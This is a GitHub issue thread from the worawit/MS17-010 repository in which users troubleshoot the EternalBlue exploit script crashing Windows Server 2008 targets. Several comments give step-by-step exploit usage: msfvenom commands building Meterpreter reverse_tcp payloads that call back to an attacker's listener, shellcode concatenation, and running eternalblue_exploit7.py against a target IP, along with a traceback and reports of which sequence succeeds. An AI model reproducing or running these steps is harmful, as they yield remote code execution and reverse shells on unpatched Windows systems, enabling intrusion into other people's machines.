search

worawit / MS17-010

MS17-010
2.13k stars 1.1k forks source link

EternalBlue7 Crashing Server 2008 #3

Closed benichmt1 closed 7 years ago

benichmt1 commented 7 years ago

Reproduction steps:

  1. Generate x64 and x32 shellcode from msvenom

$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444

...

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445 ...

  1. Run eternalblue_merge_shellcode.py ./eternalblue_merge_shellcode.py sc_x86_msf.bin sc_x64_msf.bin sc_out.bin

  2. Run python eternalblue_exploit7.py IP /opt/MS17-010/shellcode/sc_all.bin

  3. Begins connection then fails. Machine crashes. shellcode size: 874 numGroomConn: 13 Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success Traceback (most recent call last): File "eternalblue_exploit7.py", line 582, in exploit(TARGET, sc, numGroomConn) File "eternalblue_exploit7.py", line 544, in exploit recvPkt = conn.recvSMB() File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB r = self._sess.recv_packet(self.__timeout) File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet data = self.read(timeout) File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in read data = self.read_function(4, timeout) File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read raise NetBIOSTimeout impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.

ghost commented 7 years ago

I can confirm this is an issue. https://i.pitterapp.com/aJS0WbOpi.PNG

vivami commented 7 years ago

I have successfully exploited Windows Server 2008 R1 x64 doing the following:

  1. nasm -f bin eternalblue_kshellcode_x64.asm
  2. msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<LOCAL_IP> LPORT=4444
  3. cat eternalblue_kshellcode_x64 meterpreter_msf.bin > sc_x64.bin
  4. python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin

I did not use the eternalblue_merge_shellcode.py, which I wouldn't recommend using if you know the architecture of the target.

RickTorresJr commented 7 years ago

I can confirm @vivami 's steps work:

eternalblue_2008r2_success

However, it is incredibly unreliable and results in the following crash 80% of the time:

eternalblue_2008r2_instant_crash

The other type of crash experienced happens occasionally when exiting the Meterpreter session:

screen shot 2017-07-08 at 2 58 35 pm

kalifan commented 7 years ago

@RickTorresJr yes it is true. i have the same issue like you.

worawit commented 7 years ago

Error about Windows is restarted in one minute is caused from lsass.exe get crashed. It is crashed because of bad userland shellcode.

So this issue is you guys did not use exploit correctly.

imanihb2007 commented 5 years ago

04 Hi How i can resolved this problem?